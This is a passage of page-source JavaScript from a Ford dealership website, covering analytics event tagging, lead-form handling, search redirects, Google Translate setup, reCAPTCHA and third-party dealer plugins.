'ford' ][ 'onclick' ] = "about us:meet our staff:" + type; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row150(T)(1c)"); isHandled = true; } } else if (pageType === "inventory" && pageSubType === "vdp" && inMain) { if (type === "click to call") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vehicle details:content:action"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vehicle details:click to call"; jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row33(T)(1c)"); isHandled = true; })(); } } // If we are this far and none of the above have fired an event if (!isHandled) { if (type === "click to call" || type === "click to text" || type === "click to chat") { (function() { var scope = "global"; if (pageType === "inventory" && pageSubType === "vdp" ) { scope = "vehicle details"; } jzlAnalyticsObject['ford']['onclick_link_name'] = prefix + ":help:" + type; jzlAnalyticsObject['ford']['onclick'] = "help:" + type; jzlAnalyticsObject['ford']['tool'] = "event:" + type; jzlAnalyticsObject['ford']['tool_descriptor'] = type + ":" + scope; jzlAnalyticsObject['ford']['model_year'] = undefined; jzlAnalyticsObject['ford']['nameplate'] = undefined; jzlAnalyticsObject['ford']['action_name'] = "click-to-call"; fireDtm(jzlAnalyticsObject, "row11(T)(5c)"); })(); } } } })(); } }); function fireDtm( jzlAnalyticsObject, label, options ) { options = options !== undefined ? options : {}; var pageNamePostfix = options.pageNamePostfix; var vars = jzlFordDtmBuildDataVars( jzlAnalyticsObject, { pageNamePostfix: pageNamePostfix} ); var actionName = jzlAnalyticsObject[ 'ford' ][ 'action_name' ]; window.digitaldata = jzlFordDtmBuildDatalayer( window.digitaldata, actionName, vars); window.digitaldata.page.radUIVersion = window.radUIVersion; _satellite.track(actionName); } })(); </script> <script> (function(){ window.jzaq.push(["_setObject", {"page_title":"Five Star Ford","ua_group":"desktop","country":"USA","load_page_type":"page","load_page_sub_type":"home","ford":{"prefix":"dc","dtm_client":"ford","pa_code":"02486","fdaf_code":"52C","ford_region":"North Texas","country_code":"us","rad_ui_version":"ui:rad:pc","action_name":"home-load","site_section":"home","hierarchy":"home","page_name":"home","search_depth":null,"lead_type":null,"model_year":null,"nameplate":"","body_model_trim":null,"ext_int_color_code":null,"engine_trans":null,"cks_visit_id":null,"price":null,"pageload_action_label":"row14(PL)(2)","tool":null,"tool_descriptor":null,"is_vdp":false}} ]); window.jzaq.push(["_addHandler", function(obj, action, params) { window.jzlAnalyticsUpdateObject(obj, action, params); window.jzlAnalyticsPostLoadAction(obj, action); }]); })(); </script> <script>var JZL_BBT_API = { parseQueryParams: function(search) { if (!search) return {}; if (search.startsWith('?')) search = search.substring(1); var map = {}; search.split(/&/).forEach(function (m) { var parts = m.split(/=/); map[parts[0]] = parts[1]; }); return map; }, getBBTContentForPage: function (post, url, referrer_url) { var data = { url: url, domain: location.hostname, referrer: referrer_url, hash: location.hash, queryParams: this.parseQueryParams(location.search), query: location.search // Raw version }; console.log(data); return post('/wp-json/jzlbbt/v2/blocks', data); }, get: function(post, url) { return this.getBBTContentForPage(post, url, document.referrer ); } }; jazelReady(function() { var $ = jQuery; function stripDuplicateScriptsAndPlaceHtml(selector, html) { var x = $("<div>").html(html); x.find("script").each(function(i, el) { if (el.src != null && $("script[src='" + el.src + "']").length > 0) { $(el).remove(); } }); var results = ""; x.each(function(i, el) { results += $(el).html(); }); $(selector).html(results); if (window.jzlBindHelpers != null) { window.jzlBindHelpers.apply(selector); } } JZL_BBT_API.get($.post, document.location.pathname + document.location.search).then(function (data) { JZL_BBT_API.blocks = data.blocks; if (JZL_BBT_API.blocks) { var shuffleArray = function(array) { for (var i = array.length - 1; i > 0; i--) { var j = Math.floor(Math.random() * (i + 1)); var temp = array[i]; array[i] = array[j]; array[j] = temp; } return array; }; shuffleArray(JZL_BBT_API.blocks).forEach(function (o) { stripDuplicateScriptsAndPlaceHtml(o.selector, o.html); }); } if (data.rawInput) { console.log("Input to BBTAPI: "); console.log(data.rawInput); } if (data.rawOutput) { console.log("Output from BBTAPI: "); console.log(data.rawOutput); } }); (function(history){ var pushState = history.pushState; history.pushState = function(state) { if (typeof history.onPushStateArgs == "function") { history.onPushStateArgs({nextPath: arguments[2]}); } return pushState.apply(history, arguments); } })(window.history); window.onpopstate = history.onPushStateArgs = function(e) { JZL_BBT_API.get($.post, e.nextPath).then(function (data) { JZL_BBT_API.blocks = data.blocks; }); } window.setInterval(function() { if ($('#bbtSrp').is(':empty')) { if (JZL_BBT_API.blocks) { var shuffleArray = function(array) { for (var i = array.length - 1; i > 0; i--) { var j = Math.floor(Math.random() * (i + 1)); var temp = array[i]; array[i] = array[j]; array[j] = temp; } return array; }; shuffleArray(JZL_BBT_API.blocks).forEach(function (o) { stripDuplicateScriptsAndPlaceHtml(o.selector, o.html); }); } } }, 200); });</script> <script type="text/javascript"> (function () { // base object window._pxam = window._pxam || []; var pxamObject = { type: 'meta-data', pageType: 'home', dealerCode: '02486-F', wspCode: 'jazel', }; window._pxam.push(pxamObject); })(); // payload: { vehicle: [object], year: [string], make: [string], model: [string], trim: [string], isUsed: [bool], isCertified: [bool], condition: [string], vdpUrl: [string] } window.addEventListener('AUTO5.VDP_VIEW', function (e) { _pxam = _pxam || []; var bodyStyle = ""; if (e.detail.vehicle.specifications != null && e.detail.vehicle.specifications.vehicleType != null && e.detail.vehicle.specifications.vehicleType.length > 0) { bodyStyle = e.detail.vehicle.specifications.vehicleType[0]; } var ajaxpageview = { type: 'event', eventType: 'ajaxPageView', pageType: 'vdp', vehicleType: e.detail.isUsed ? "used" : "new", make: e.detail.make, model: e.detail.model, year: e.detail.year, vin: e.detail.vehicle.vin, bodyStyle: bodyStyle }; _pxam.push(ajaxpageview); }); window.addEventListener('srp_vehicles_loaded', function (e) { _pxam = _pxam || []; var ajaxpageview = { type: 'event', eventType: 'ajaxPageView', pageType: 'vlp' } _pxam.push(ajaxpageview); }); window.addEventListener('AUTO5.COMPARE', function (e) { _pxam = _pxam || []; var ajaxpageview = { type: 'event', eventType: 'ajaxPageView', pageType: 'comparison' } _pxam.push(ajaxpageview); }); window.addEventListener('AUTO5.OPEN_INCENTIVES', function (e) { _pxam = _pxam || []; var ajaxpageview = { type: 'event', eventType: 'ajaxPageView', pageType: 'other' } _pxam.push(ajaxpageview); }); </script> <script> if (typeof Object.assign != 'function') { Object.assign = function(target) { 'use strict'; if (target == null) { throw new TypeError('Cannot convert undefined or null to object'); } target = Object(target); for (var index = 1; index < arguments.length; index++) { var source = arguments[index]; if (source != null) { for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } } return target; }; } window.jzaq.push(["_addHandler", function(obj, action, params) { if (action === "ROCKET_SPECIAL_SELECT") { var formId = params.formId; window.formAdditionalParams = window.formAdditionalParams || {}; window.formAdditionalParams[formId] = { year: params.vehicleYear, make: params.vehicleMake, model: params.vehicleModel, }; } if (action === "FORM.SUBMITCLICK") { var loadPageType = obj[ 'load_page_type' ]; var loadPageSubType = obj[ 'load_page_sub_type' ]; var formId = params.formId; window.formAdditionalParams = window.formAdditionalParams || {}; var additionalParams = window.formAdditionalParams[formId]; var fields = Object.assign({}, params.fields, additionalParams); delete fields['jazel-lead-context']; var formType = params.formType; if (formType == null) { // If formType is null, we perform some heuristics to detect what the // form type is. We do this based on whether the form is on the SRP/VDP, // and also based on the current page for full page forms if (loadPageType === "inventory") { if (loadPageSubType === "srp" || loadPageSubType === "vdp") { if (params.ctaLabel !== null) { formType = "e-price-" + loadPageSubType; } else { formType = "redeem-offer-" + loadPageSubType; } } } else if (loadPageType === "quick-quote") { formType = "request-quote"; } else if (loadPageType === "schedule-service") { formType = "schedule-service"; } else if (loadPageType === "test-drive") { formType = "test-drive"; } else if (loadPageType === "employment-application") { formType = "employment-application"; } else if (loadPageType === "contact-us") { formType = "contact-us"; } else if (loadPageType === "vehicle-locator") { formType = "vehicle-locator"; } else if (loadPageType === "service-center") { formType = "service-question"; } else if ( loadPageType === "dealer-specials" || loadPageType === "finance-specials" || loadPageType === "lease-specials" || loadPageType === "service-specials" || loadPageType === "manufacturer-incentives" ) { formType = "claim-your-special"; } } var data = { provider: params.provider, form_type: formType, load_page_type: loadPageType, load_page_sub_type: loadPageSubType, cta_label: params.ctaLabel, fields: fields, }; var contextNode = params.formNode.querySelector("[data-field-type=\"jazel-lead-context\"]"); contextNode.value = JSON.stringify(data); } }]); </script> <script> (function() { var urlMap = {"12223":"https://www.5starford.com/inventory/used-cars-dallas-tx/","11712":"https://www.5starford.com/inventory/used-vehicles-merged/","2477":"https://www.5starford.com/inventory/transit/","2476":"https://www.5starford.com/inventory/taurus/","2475":"https://www.5starford.com/inventory/super-duty/","2473":"https://www.5starford.com/inventory/mustang/","2472":"https://www.5starford.com/inventory/new-inventory-specials/","2471":"https://www.5starford.com/inventory/fusion/","2470":"https://www.5starford.com/inventory/focus/","2469":"https://www.5starford.com/inventory/flex/","2468":"https://www.5starford.com/inventory/fiesta/","2467":"https://www.5starford.com/inventory/f-150/","2466":"https://www.5starford.com/inventory/explorer/","2465":"https://www.5starford.com/inventory/expedition/","2464":"https://www.5starford.com/inventory/escape/","2463":"https://www.5starford.com/inventory/edge/","2462":"https://www.5starford.com/inventory/e-series/","2461":"https://www.5starford.com/inventory/c-max/","2460":"https://www.5starford.com/inventory/ford-transit-dallas-tx/","2459":"https://www.5starford.com/inventory/ford-taurus-dallas-tx/","2458":"https://www.5starford.com/inventory/ford-mustang-dallas-tx/","2457":"https://www.5starford.com/inventory/ford-fusion-dallas-tx/","2456":"https://www.5starford.com/inventory/ford-focus-dallas-tx/","2455":"https://www.5starford.com/inventory/ford-flex-dallas-tx/","2454":"https://www.5starford.com/inventory/ford-fiesta-dallas-tx/","2453":"https://www.5starford.com/inventory/ford-f-150-dallas-tx/","2452":"https://www.5starford.com/inventory/ford-explorer-dallas-tx/","2451":"https://www.5starford.com/inventory/ford-expedition-dallas-tx/","2450":"https://www.5starford.com/inventory/ford-escape-dallas-tx/","2449":"https://www.5starford.com/inventory/ford-edge-dallas-tx/","2448":"https://www.5starford.com/inventory/ford-c-max-dallas-tx/","2447":"https://www.5starford.com/inventory/used-cars-for-sale-under-5000/","2446":"https://www.5starford.com/inventory/used-cars-under-10k/","2444":"https://www.5starford.com/inventory/used-specials/","2443":"https://www.5starford.com/inventory/new-arrivals/","2442":"https://www.5starford.com/inventory/new-vehicles-dallas-tx/","2441":"https://www.5starford.com/inventory/new-vehicles-plus/","2439":"https://www.5starford.com/inventory/make-deal-vehicles/","2438":"https://www.5starford.com/inventory/lifted-trucks/","2437":"https://www.5starford.com/inventory/just-reduced/","2436":"https://www.5starford.com/inventory/commercial-vehicles/","2435":"https://www.5starford.com/inventory/clearance/","2429":"https://www.5starford.com/inventory/all-vehicles-autofi/","2088":"https://www.5starford.com/inventory/all-vehicles/","2087":"https://www.5starford.com/inventory/new-vehicles/","2086":"https://www.5starford.com/inventory/certified-pre-owned/","2085":"https://www.5starford.com/inventory/used-vehicles/"}; var ftsFormIds = ["ext-search-form","expanding-search-form","fts-form"]; ftsFormIds.forEach(function(formId) { var form = document.getElementById(formId); if (form != null) { form.addEventListener("submit", function(e) { var srpId = parseInt(form.elements["srp_id"].value, 10); var srpUrl = urlMap[srpId]; if (srpUrl == null) { // if it happens for whatever reason that the item is not in the // object, let the tweak get out of the way and do things the traditional way return; } e.preventDefault(); var redirectTarget = srpUrl; if (srpUrl.charAt(srpUrl.length - 1) !== "/") { redirectTarget += "/"; } var q = form.elements["q"].value; if (q !== "") { redirectTarget += "text=" + q; } window.location.href = redirectTarget; }); } }); })();</script> <script> jazelReady(function () { jQuery.getScript("https://www.ford.com/fps/script/Ford/USA?xdc=true", function (data, status, xhr) { if (xhr.status === 200) { getVDLD(); } else { console.log('Error loading script'); } }); }); function getVDLD() { FPS.get([{ VDLD: {} } ], { success: function (data, status, xhr) { if (!data[0].VDLD[0]) { console.log("No FPS Data"); } else { var VIN = data[0].VDLD[0].VIN; var stock = data[0].VDLD[0].stock; if (VIN === "" || Date.parse(data[0].VDLD[0].on) < Date.parse(xhr.getResponseHeader("expires")) - 30000 || stock === "") { console.log("Time expired, VIN or Stock empty age: " + (Date.parse(data[0].VDLD[0].on) - (Date.parse(xhr.getResponseHeader("expires")) - 15000)) + " VIN: " + VIN + " Stock: " + stock); return; } else { console.log("Redirecting Age: " + (Date.parse(data[0].VDLD[0].on) - (Date.parse(xhr.getResponseHeader("expires")) - 15000)) + " VIN:" + VIN + " Stock:" + stock); FPS.set([{ VDLD: { "VIN": "", "stock": "" } } ], { success: function () { }, error: function () { return; } }); var redirect = "/inventory/all-vehicles/vehicle/" + VIN + "/" + stock; window.location.href = redirect; } } }, error: function () { return; } }); } </script> <script type="application/json" data-jzlbind-state="coupon_0">{"isFullDisclaimerHidden":true}</script><script type="application/json" data-jzlbind-state="coupon_1">{"isFullDisclaimerHidden":true}</script><script type="application/json" data-jzlbind-state="hpsm_ui_state">{"currentTab":"custom1"}</script><script type="application/json" data-jzlbind-state="hpsmFiltersState" data-jzlbind-state-src="https://rocket-prod.jazelc.com:29620/rocket-hpsm-search-info?searchEndpoint=//search-a5-jazel-tango.jazel-qa.com/api/&amp;accountId=0&amp;vehicleFilterIds=440,193,194,196&amp;bodyTypeFacetName=vehicle_type_sidebar">null</script><!-- Rocket Theme: saddleback --><!-- Layouts: --> <!-- Key: common -> 000 --> <!-- Key: actionBar -> 000 --> <!-- Key: mobileUx -> 000 --> <!-- Key: themeHeader -> saddleback-default --> <!-- Key: themeFooter -> 001 --> <!-- Key: legalFooter -> 000 --> <!-- Key: seoFooter -> 000 --> <script> (function() { if (!String.prototype.endsWith) { String.prototype.endsWith = function(search, this_len) { if (this_len === undefined || this_len > this.length) { this_len = this.length; } return this.substring(this_len - search.length, this_len) === search; }; } function resetTranslate() { var $frame = jQuery('.goog-te-banner-frame:first'); if (!$frame.size()) { console.log("Error: Could not find Google translate frame."); return false; } $frame.contents() .find("button") .each(function(i, el) { if (el.id.endsWith(".restore")) { el.click(); } }); } function doTranslate(lang) { var $frame = jQuery('.goog-te-menu-frame:first'); if (!$frame.size()) { console.log("Error: Could not find Google translate frame."); return false; } $frame.contents() .find('.goog-te-menu2-item span.text') .each(function () { if (jQuery(this).html() === lang) { jQuery(this).click(); } }); } var includedLanguages = []; jazelReady(function() { $ = jQuery; var supportedLanguages = [ { "prefix": "af", "label": "Afrikaans" }, { "prefix": "sq", "label": "Albanian" }, { "prefix": "am", "label": "Amharic" }, { "prefix": "ar", "label": "Arabic" }, { "prefix": "hy", "label": "Armenian" }, { "prefix": "az", "label": "Azerbaijani" }, { "prefix": "eu", "label": "Basque" }, { "prefix": "be", "label": "Belarusian" }, { "prefix": "bn", "label": "Bengali" }, { "prefix": "bs", "label": "Bosnian" }, { "prefix": "bg", "label": "Bulgarian" }, { "prefix": "ca", "label": "Catalan" }, { "prefix": "ceb", "label": "Cebuano" }, { "prefix": "ny", "label": "Chichewa" }, { "prefix": "zh-CN", "label": "Chinese" }, { "prefix": "co", "label": "Corsican" }, { "prefix": "hr", "label": "Croatian" }, { "prefix": "cs", "label": "Czech" }, { "prefix": "da", "label": "Danish" }, { "prefix": "nl", "label": "Dutch" }, { "prefix": "en", "label": "English" }, { "prefix": "eo", "label": "Esperanto" }, { "prefix": "et", "label": "Estonian" }, { "prefix": "tl", "label": "Filipino" }, { "prefix": "fi", "label": "Finnish" }, { "prefix": "fr", "label": "French" }, { "prefix": "fy", "label": "Frisian" }, { "prefix": "gl", "label": "Galician" }, { "prefix": "ka", "label": "Georgian" }, { "prefix": "de", "label": "German" }, { "prefix": "el", "label": "Greek" }, { "prefix": "gu", "label": "Gujarati" }, { "prefix": "ht", "label": "Haitian Creole" }, { "prefix": "ha", "label": "Hausa" }, { "prefix": "haw", "label": "Hawaiian" }, { "prefix": "iw", "label": "Hebrew" }, { "prefix": "hi", "label": "Hindi" }, { "prefix": "hmn", "label": "Hmong" }, { "prefix": "hu", "label": "Hungarian" }, { "prefix": "is", "label": "Icelandic" }, { "prefix": "ig", "label": "Igbo" }, { "prefix": "id", "label": "Indonesian" }, { "prefix": "ga", "label": "Irish" }, { "prefix": "it", "label": "Italian" }, { "prefix": "ja", "label": "Japanese" }, { "prefix": "jw", "label": "Javanese" }, { "prefix": "kn", "label": "Kannada" }, { "prefix": "kk", "label": "Kazakh" }, { "prefix": "km", "label": "Khmer" }, { "prefix": "ko", "label": "Korean" }, { "prefix": "ku", "label": "Kurdish (Kurmanji)" }, { "prefix": "ky", "label": "Kyrgyz" }, { "prefix": "lo", "label": "Lao" }, { "prefix": "la", "label": "Latin" }, { "prefix": "lv", "label": "Latvian" }, { "prefix": "lt", "label": "Lithuanian" }, { "prefix": "lb", "label": "Luxembourgish" }, { "prefix": "mk", "label": "Macedonian" }, { "prefix": "mg", "label": "Malagasy" }, { "prefix": "ms", "label": "Malay" }, { "prefix": "ml", "label": "Malayalam" }, { "prefix": "mt", "label": "Maltese" }, { "prefix": "mi", "label": "Maori" }, { "prefix": "mr", "label": "Marathi" }, { "prefix": "mn", "label": "Mongolian" }, { "prefix": "my", "label": "Myanmar (Burmese)" }, { "prefix": "ne", "label": "Nepali" }, { "prefix": "no", "label": "Norwegian" }, { "prefix": "ps", "label": "Pashto" }, { "prefix": "fa", "label": "Persian" }, { "prefix": "pl", "label": "Polish" }, { "prefix": "pt", "label": "Portuguese" }, { "prefix": "pa", "label": "Punjabi" }, { "prefix": "ro", "label": "Romanian" }, { "prefix": "ru", "label": "Russian" }, { "prefix": "sm", "label": "Samoan" }, { "prefix": "gd", "label": "Scots Gaelic" }, { "prefix": "sr", "label": "Serbian" }, { "prefix": "st", "label": "Sesotho" }, { "prefix": "sn", "label": "Shona" }, { "prefix": "sd", "label": "Sindhi" }, { "prefix": "si", "label": "Sinhala" }, { "prefix": "sk", "label": "Slovak" }, { "prefix": "sl", "label": "Slovenian" }, { "prefix": "so", "label": "Somali" }, { "prefix": "es", "label": "Spanish" }, { "prefix": "su", "label": "Sundanese" }, { "prefix": "sw", "label": "Swahili" }, { "prefix": "sv", "label": "Swedish" }, { "prefix": "tg", "label": "Tajik" }, { "prefix": "ta", "label": "Tamil" }, { "prefix": "te", "label": "Telugu" }, { "prefix": "th", "label": "Thai" }, { "prefix": "tr", "label": "Turkish" }, { "prefix": "uk", "label": "Ukrainian" }, { "prefix": "ur", "label": "Urdu" }, { "prefix": "uz", "label": "Uzbek" }, { "prefix": "vi", "label": "Vietnamese" }, { "prefix": "cy", "label": "Welsh" }, { "prefix": "xh", "label": "Xhosa" }, { "prefix": "yi", "label": "Yiddish" }, { "prefix": "yo", "label": "Yoruba" }, { "prefix": "zu", "label": "Zulu" } ]; var languageMap = supportedLanguages.reduce(function(acc, item) { acc[item.prefix] = item.label; return acc; }, {}); var anchors = $("a"); anchors.each(function(i, anchor) { var $anchor = $(anchor); var language = null; var isTranslateLink = false; if ($anchor.data("type") === "language") { isTranslateLink = true; language = $anchor.data("value"); } else { var href = $anchor.attr("href"); var segments = href != null ? href.split(":") : []; if (segments[0] === "translate") { isTranslateLink = true; language = segments[1]; } } if (isTranslateLink) { if (language in languageMap) { includedLanguages.push(language); $anchor.click(function() { var fullLanguage = languageMap[language]; doTranslate(fullLanguage); return false; }); } else { $anchor.click(function() { return false; }); } } }); var translateDropdown = $("select#translate-dropdown"); if (translateDropdown.length > 0) { var translateOptions = translateDropdown.find("option"); var translateAnchor = $("#translate-anchor"); translateOptions.each(function(i, option) { var language = option.value; if (language in languageMap) { includedLanguages.push(language); } }); translateDropdown.change(function() { var translateAnchorText; if (this.value === "none") { resetTranslate(); translateAnchorText = translateAnchor.data("initialText"); } else { var fullLanguage = languageMap[this.value]; if (fullLanguage) { doTranslate(fullLanguage); } translateAnchorText = translateAnchor.data("resetText"); } if (translateAnchorText != null) { translateAnchor.text(translateAnchorText); } }); } }); function googleTranslateElementInit() { jazelReady(function() { new google.translate.TranslateElement({ pageLanguage: 'en', includedLanguages: includedLanguages.join(","), layout: google.translate.TranslateElement.InlineLayout.SIMPLE, autoDisplay: false }, 'google_translate_element'); }); } window.googleTranslateElementInit = googleTranslateElementInit; })(); </script> <script async async="async" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit" type="text/javascript"></script> <!-- Code provided by Google --> <div id="google_translate_element" style="width:0;height:0;margin:0;overflow:hidden;"></div> <script>(function(d, s, id) { var js, cnjs = d.getElementsByTagName('head')[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//app.carnow.com/dealers/carnow_plugin.js?key=n6ymx5qlxB6LwwcI0ptecnxGteoBCcB40IsdkIo4hBvCfnnF"; cnjs.appendChild(js, cnjs); js.onload = function () { CarNowPlugin.init(); } }(document, 'script', 'com-carnow-plugin'));</script> <script src="//plugin.tradepending.com/v5/snap-zDMac7biTpL6G9n8N.js" defer></script> <script src="//checkout.autofi.com/script.js" async></script> <script src="//secure.adnxs.com/px?id=933711&t=1" async></script> <script src="//integrator.swipetospin.com" async></script> <script></script><script></script> <link rel='stylesheet' id='font-awesome-css' href='/content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=5.2.1' type='text/css' media='all' /><script type='text/javascript' async="async" src='/content/themes/jazelbase/js/navigation.min.js?ver=20190222-0000'></script><script type='text/javascript' src='https://www.google.com/recaptcha/api.js?onload=reCaptchaOnloadCallback&#038;render=6LeTIJMUAAAAAEiBJJWe8dC7WFXH05AYCUmXMQvl&#038;ver=3.0'></script><script type='text/javascript'> function jzl_recaptcha_verify(action) { grecaptcha.ready(function() { grecaptcha.execute('6LeTIJMUAAAAAEiBJJWe8dC7WFXH05AYCUmXMQvl', {action: action}) .then(function(token) { jazelReady(function() { jQuery.ajax( '/wp-json/jazel-auto5/v1/recaptcha-verify?action=' + action + '&token=' + token ); }); }); }); } function reCaptchaOnloadCallback() { jzl_recaptcha_verify( 'page_load' ); } </script> <script> jazelReady(function() { var script = document.createElement('script'); script.src = '//cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.9.0/slick.min.js'; script.onload = function() { jazelReady(function() { jQuery('[data-vars-component-type="carousel"]').each(function() { var $this = jQuery(this); $this.on('beforeChange', function(e, slick, currentSlide, nextSlide) { $this.find(".slide-index-" + nextSlide + " img").each(function(i, node) { if (window.jzlBindHelpers != null) { window.jzlBindHelpers.imageIsReady(node); } }); }); $this.slick(); }); }); }; document.head.appendChild(script); }); </script> <script type="text/javascript"><!-- function handle_search_event(e) { if (e.detail.models.length > 0) { var years = e.detail.years.length === 0 ? ((new Date()).getFullYear() + '') : e.detail.years.join(','); var brands = e.detail.makes.join(','); var nameplates = brands + ' ' + e.detail.models.join(','); var paCode = "02486"; var fps_payload = [FPS.lib.ActionNameplateT3(years, brands, nameplates, paCode, FPS.actions.SIResultsT3)]; FPS.set(fps_payload); } } // SRP Vehicles loaded (will catch new searches caused by filter change & initial pages loads) window.addEventListener('search_srp', handle_search_event); window.addEventListener('window_sticker_click', function(e) { var vehicle = e.detail.vehicle; if( vehicle === null ) { console.log("window_sticker_click event was fired without vehicle details.") } else { var year = vehicle.year; var brand = vehicle.make; var nameplate = vehicle.make + ' ' + vehicle.model; var trim = vehicle.trim; var vin = vehicle.vin; var zip = vehicle.location.zipCode; FPS.set([ FPS.lib.SpecificVehicleViewT3(vin, "JZL", "02486", zip, year, brand, nameplate, trim, window.location.href, FPS.actions.ViewWindowSticker) ]); } }); // VDP view window.addEventListener('load_vdp', function (e) { var details = e.detail; if( details === null ) { console.log("load_vdp event was fired without event details.") } else { var year = details.year; var brand = details.make; var nameplate = details.make + ' ' + details.model; var trim = details.trim; var vin = details.vin; var zip = details.location.zipCode; // documentation indicate a seperate event for CPO vehicle views. if (details.isCertified) { FPS.set([FPS.lib.ActionTrimT3(year, brand, nameplate, trim, window.location.href, "02486", FPS.actions.CPODetailViewT3)]); } else { // JAZ-283 FPS.set([ FPS.lib.SpecificVehicleViewT3(vin, "JZL", "02486", zip, year, brand, nameplate, trim, window.location.href, FPS.actions.SVVSIT3) ]); } } }); //--></script> <script> (function() { window.addEventListener('submit', function(e) { var form = e.target; if (form.matches('#rocket-form-110')) { if (form.elements.recaptcha_token == null) { e.stopImmediatePropagation(); e.preventDefault(); grecaptcha.ready(function() { grecaptcha.execute('6LeTIJMUAAAAAEiBJJWe8dC7WFXH05AYCUmXMQvl', {action: 'form_110'}).then(function(token) { var newInput = document.createElement('input'); newInput.type = 'hidden'; newInput.name = 'recaptcha_token'; newInput.value = token; form.appendChild(newInput); form.querySelector('input[type=submit]').click(); }); }); } } }, true); })(); </script> <script type="application/json" data-jzlbind-state="stateMobileUxExpandingSearch">{"open":false}</script><script type="application/json" data-jzlbind-state="bars">{"activeBars":[]}</script><script type="application/json" data-jzlbind-state="panels">{"activePanel":""}</script><script type="application/json" data-jzlbind-state="nav_menu__1">{"firstLevelSelectedId":2154,"secondLevelOpenIds":{}}</script><script type="application/json" data-jzlbind-state="filtersSearchState">{"loadData":false,"expanded":[],"additionalFiltersShown":false}</script><script type="application/json" data-jzlbind-state="filtersState" data-jzlbind-state-src-bind="h('filtersSearchState.loadData') ? 'https://rocket-prod.jazelc.com:29620/rocket-nav-search-info?searchEndpoint=//search-a5-jazel-tango.jazel-qa.com/api/&amp;accountId=0&amp;vehicleFilterIds=440&amp;bodyTypeFacetName=vehicle_type_sidebar' : null">{}</script><script type="application/json" data-jzlbind-state="sideRailState">{"open":false,"page":"account"}</script><script type="application/json" data-jzlbind-state="loginPopupState">{"page":"login","accountPage":"account"}</script><script type="application/json" data-jzlbind-state="shopPageState">{"mode":"short"}</script><script type="application/json" data-jzlbind-state="login_messages">{}</script><script type="application/json" data-jzlbind-state="signup_messages">{}</script><script type="application/json" data-jzlbind-state="reset_password_data">{}</script><script type="application/json" data-jzlbind-state="reset_password_messages">{}</script><script type="application/json" data-jzlbind-state="cognito" data-jzlbind-replace="CLIENT_ID" data-jzlbind-state-src-bind="h('interactions.started') ? 'https://rocket-prod.jazelc.com:29620/cognito/initial-state/?cid=CLIENT_ID(cid)&amp;group_id=fivestarfordnrhspeed-sherwin&amp;config=eyJjb25maWdEZWFsZXJOYW1lIjoiRml2ZSBTdGFyIEZvcmQiLCJjb25maWdEZWFsZXJBZGRyZXNzIjoiMTIzIE1haW4gU3QuIiwiY29uZmlnRGVhbGVyQ2l0eSI6Ik5vcnRoIFJpY2hsYW5kIEhpbGxzIiwiY29uZmlnRGVhbGVyU3RhdGUiOiJUZW5uZXNzZWUiLCJjb25maWdEZWFsZXJTdGF0ZVNob3J0IjoiVFgiLCJjb25maWdEZWFsZXJaaXAiOiI3NjE4MC03ODQ0IiwiY29uZmlnRGVhbGVyUHJpbWFyeVBob25lTnVtYmVyIjoiKDgxNykgNDk4LTg4MzgiLCJjb25maWdWZHBMaW5rVGVtcGxhdGUiOiJ7e2NvbmRpdGlvbnM6dXNlZF9vcl9jZXJ0aWZpZWR9fSB7e3llYXJ9fSB7e21ha2V9fSB7e21vZGVsfX0ge3tsb2NhdGlvbl9jaXR5fX0ge3tsb2NhdGlvbl9zdGF0ZX19IiwiY29uZmlnRW5hYmxlSW5kZXBlbmRlbnRWZHAiOmZhbHNlLCJjb25maWdEZWFsZXJTcnBVcmwiOiJodHRwczovL3d3dy41c3RhcmZvcmQuY29tL2ludmVudG9yeS9hbGwtdmVoaWNsZXMvIn0%3D' : null">null</script> <amp-state id="nav_menu__1"> <script type="application/json"> {"firstLevelSelectedId":2154,"secondLevelOpenIds":{}} </script> </amp-state> <amp-state id="nav_menu__2"> <script type="application/json"> {"firstLevelSelectedId":2154,"secondLevelOpenIds":{}} </script> </amp-state> <amp-state id="nav_menu__3"> <script type="application/json"> {"firstLevelSelectedId":2154,"secondLevelOpenIds":{}} </script> </amp-state> <script> (function() { function checkScroll() { if (window.pageYOffset > 10) { window.document.body.classList.add("sticky-top"); window.document.body.classList.remove("non-sticky-top"); } else { window.document.body.classList.remove("sticky-top"); window.document.body.classList.add("non-sticky-top"); } } jazelReady(checkScroll); window.addEventListener("scroll", checkScroll); })(); </script> <script> (function() { /** * Sets or removes .focus class on an element. */ function toggleFocus() { var self = this; // Move up through the ancestors of the current link until we hit .nav-menu. while ( -1 === self.className.indexOf( 'nav-menu' ) ) { // On li elements toggle the class .focus. if ( 'li' === self.tagName.toLowerCase() ) { if ( -1 !== self.className.indexOf( 'focus' ) ) { self.className = self.className.replace( ' focus', '' ); } else { self.className += ' focus'; } } self = self.parentElement; } } function toggleFocusClassOnTablet( container ) { var touchStartFn, i, parentLink = container.querySelectorAll( '.menu-item-has-children > a, .page_item_has_children > a' ); if ( 'ontouchstart' in window ) { touchStartFn = function( e ) { var menuItem = this.parentNode, i; if ( ! menuItem.classList.contains( 'focus' ) ) { e.preventDefault(); for ( i = 0; i < menuItem.parentNode.children.length; ++i ) { if ( menuItem === menuItem.parentNode.children[i] ) { continue; } menuItem.parentNode.children[i].classList.remove( 'focus' ); } menuItem.classList.add( 'focus' ); } else { menuItem.classList.remove( 'focus' ); } }; for ( i = 0; i < 